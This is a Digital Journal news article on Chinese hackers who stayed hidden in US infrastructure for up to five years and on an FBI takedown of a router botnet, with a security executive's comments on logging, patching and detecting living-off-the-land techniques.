Lurking for five years: How Chinese hackers infiltrated US infrastructure


ByDr. Tim Sandle
February 14, 2024

Image: © AFP/File Fred TANNEAU

U.S. law enforcement has reported how Chinese hackers remaining hidden for up to five years in U.S. infrastructure. As this news continues to develop, Andrew Hollister, CISO & VP Labs R&D at LogRhythm, ponders on what this means for U.S. national security and cyber-preparedness.

According to The Guardian, the FBI operation disrupted a botnet of hundreds of small office and home routers based in the U.S. that were owned by private citizens and companies that had been hijacked by the Chinese hackers.

Hollister tells Digital Journal: “In light of the recent advisory from U.S. government agencies regarding cybersecurity threats, notably the infiltration of US infrastructure by Chinese hackers as disclosed, there’s a pressing need to reinforce proactive defense measures in today’s digital landscape.”

Looking at the study in more detail, Hollister thinks the length of time the hackers had access for is the greatest concern: “An interesting aspect highlighted by the feedback is the duration of time that threat actors were able to persist. Early detection is emphasized as crucial in preventing threat actors from establishing long-term persistence, as seems to be the case in this report.”

Reviewing what the U.S. government plans to do next, Hollister considers: “The recommendations include implementing robust logging collection and patching strategies, which are considered fundamental steps towards bolstering cybersecurity resilience across organizations.”

There are other measures too, which Hollister calls out: “Furthermore, the advisory underscores the importance of a comprehensive approach to threat detection, emphasizing the monitoring and securing of critical applications beyond the immediate scope of the advisory.”

There are other areas that both government and business need to focus on. Hollister identifies: “Understanding and tracking potential vulnerabilities, such as those associated with Remote Desktop Protocol (RDP) connections, is deemed essential for identifying and mitigating risks effectively. The discussion also sheds light on the extent to which broader concept of “living off the land” (LotL) techniques were used, wherein threat actors leverage existing tools and features within target environments to evade detection.”

Living Off The Land (LotL) is a covert cyberattack technique in which criminals carry out malicious activities using legitimate IT administration tools.

It is in this area that resources need to be directed. Here Hollister recommends: “Maturing capabilities around detecting LotL attacks is seen as crucial for organizations to assure effective defense strategies. By focusing on detecting attacker tactics, techniques, and procedures (TTPs), organizations can enhance their ability to identify and respond to potential threats effectively.”

Returning back to the U.S. government, Hollister reminds both public and private sector bodies what it is they need to be focusing on the most: “The advisory serves as a call to action for organizations to prioritize proactive monitoring, threat hunting, and continuous improvement in their cybersecurity posture to mitigate risks effectively, regardless of the specific tools or solutions they employ.”